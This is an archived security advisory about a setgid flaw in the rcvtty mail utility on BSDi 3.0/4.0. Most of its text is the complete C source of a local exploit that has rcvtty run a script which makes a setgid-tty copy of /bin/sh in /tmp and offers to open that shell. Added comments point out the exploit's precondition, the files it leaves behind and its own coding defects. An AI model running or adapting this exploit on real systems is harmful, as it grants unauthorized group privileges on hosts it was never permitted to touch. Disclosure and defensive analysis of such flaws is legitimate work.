27th Nov 2000 [SBWID-165]
COMMAND
	    rcvtty (mh)
SYSTEMS AFFECTED
	    BSDi 3.0/4.0
PROBLEM
	    Chris Sharp found the following.  We don't know whether rcvtty is
	    supposed to be setgid in general, since we have never seen it setgid
	    on anything but BSDi 3.0 and 4.0.  Nonetheless, here is an exploit
	    Chris wrote for it:
	
	        http://realhalo.org/xrcvtty.c
	
	    xrcvtty.c (modified from original):
	
	    /* (BSDi3.0/4.0)rcvtty[mh] local exploit, by
	       v9[[email protected]].  gives gid=4(tty).
	       info: found/exploit by: v9[[email protected]].
	    */
	    /* Review notes (a defender's reading of this listing):
	       - Precondition, checked below before anything else happens:
	         PATH must be a regular file with mode 02755 and group GIDTTY.
	         If the setgid bit is not set on rcvtty the program exits at
	         that first check, so clearing it removes the precondition.
	       - Artifacts left on a host where this ran: /tmp/mksh.sh is
	         created and then unlinked; /tmp/ttysh, a copy of /bin/sh
	         with the setgid bit and group GIDTTY, is left behind.  Both
	         names are fixed, which makes them straightforward to look for.
	       - Only <stdio.h> and <sys/stat.h> are included; exit(),
	         unlink(), chmod(), system() and execl() are called without
	         prototypes (pre-C99 implicit declarations), and main() has an
	         implicit int return type.  The listing is kept as published;
	         its own C defects are annotated inline, not fixed. */
	    #define PATH      "/usr/contrib/mh/lib/rcvtty"  /* target setgid binary */
	    #define MAKESHELL "/tmp/mksh.sh"                /* scratch script, removed after use */
	    #define SGIDSHELL "/tmp/ttysh"                  /* setgid shell copy, left on disk */
	    #define GIDTTY    4                             /* gid of group tty on BSDi (per header) */
	    #include <stdio.h>
	    #include <sys/stat.h>
	    main(){
	     /* in[0] is a zero-length array (not valid standard C); the
	        scanf("%s",in) near the end writes past it -- undefined
	        behaviour / stack corruption in the exploit itself. */
	     char cmd[256],in[0];
	     struct stat mod1,mod2;
	     FILE *sgidexec;
	     fprintf(stderr,"[ (BSDi3.0/4.0)rcvtty[mh] local"
	     " exploit, by v9[[email protected] ]. ]\n\n");
	     if(stat(PATH,&mod1)){
	      fprintf(stderr,"[!] failed, %s doesnt appear to"
	      " exist.\n",PATH);
	      exit(1);
	     }
	     else
	     /* 34285 == 0102755 octal == S_IFREG | S_ISGID | 0755: the test
	        passes only for a regular file whose mode is exactly 2755. */
	     if(mod1.st_mode==34285&&mod1.st_gid==GIDTTY){
	      fprintf(stderr,"[*] %s appears to be setgid"
	      " tty(%d).\n",PATH,GIDTTY);
	     }
	     else{
	      fprintf(stderr,"[!] failed, %s isn't setgid"
	      " tty(%d).\n",PATH,GIDTTY);
	      exit(1);
	     }
	     fprintf(stderr,"[*] now making shell script to"
	     " execute.\n");
	     unlink(MAKESHELL);
	     /* fopen result is not checked: a NULL stream is passed to
	        fprintf/fclose below if /tmp is not writable. */
	     sgidexec=fopen(MAKESHELL,"w");
	     fprintf(sgidexec,"#!/bin/sh\n");
	     fprintf(sgidexec,"cp /bin/sh %s\n",SGIDSHELL);
	     fprintf(sgidexec,"chgrp %d"
	     " %s\n",GIDTTY,SGIDSHELL);
	     fprintf(sgidexec,"chmod 2755 %s\n",SGIDSHELL);
	     fclose(sgidexec);
	     /* 33261 == 0100755 octal: regular file, rwxr-xr-x */
	     chmod(MAKESHELL,33261);
	     fprintf(stderr,"[*] done, now building and"
	     " executing the command line.\n");
	     /* The setgid target is run via system() with the script path
	        as its argument and "yes" on stdin.  The exploit's premise --
	        presumably that rcvtty executes that argument while holding
	        the tty group -- is not shown on this page. */
	     snprintf(cmd,sizeof(cmd),"echo yes | %s %s"
	     " 1>/dev/null 2>&1",PATH,MAKESHELL);
	     system(cmd);
	     unlink(MAKESHELL);
	     fprintf(stderr,"[*] done, now checking for"
	     " success.\n");
	     if(stat(SGIDSHELL,&mod2)){
	      fprintf(stderr,"[!] failed, %s doesn't"
	      " exist.\n",SGIDSHELL);
	      exit(1);
	     }
	     else
	     /* same 0102755 + group check as above, now on the copied shell */
	    if(mod2.st_mode==34285&&mod2.st_gid==GIDTTY){
	      fprintf(stderr,"[*] success, %s is now setgid"
	      " tty(%d).\n",SGIDSHELL,GIDTTY);
	     }
	     else{
	      fprintf(stderr,"[!] failed, %s isn't setgid"
	      " tty(%d).\n",SGIDSHELL,GIDTTY);
	      exit(1);
	     }
	     fprintf(stderr,"[*] finished, everything"
	     " appeared to have gone successful.\n");
	     fprintf(stderr,"[?] do you wish to enter the"
	     " sgidshell now(y/n)?: ");
	     /* unbounded %s into the zero-length buffer declared above */
	     scanf("%s",in);
	     /* 0x59 == 'Y', 0x79 == 'y' */
	     if(in[0]!=0x59&&in[0]!=0x79){
	      printf("[*] ok, aborting execution, the shell"
	      " is: %s.\n",SGIDSHELL);
	     }
	     else{
	      printf("[*] ok, executing shell(%s) now.\n",
	      SGIDSHELL);
	      /* execl's argument list must end with (char *)NULL; passing
	         int 0 through the variadic call is wrong where int and
	         pointer sizes differ. */
	      execl(SGIDSHELL,SGIDSHELL,0);
	     }
	     exit(0);
	    }
	
	    In nmh (mh's actively-maintained descendant), at least, rcvtty  is
	    not installed setgid.  Not sure if there's a BSD port of nmh  that
	    makes it so, though.
SOLUTION
	    Nothing yet.
	
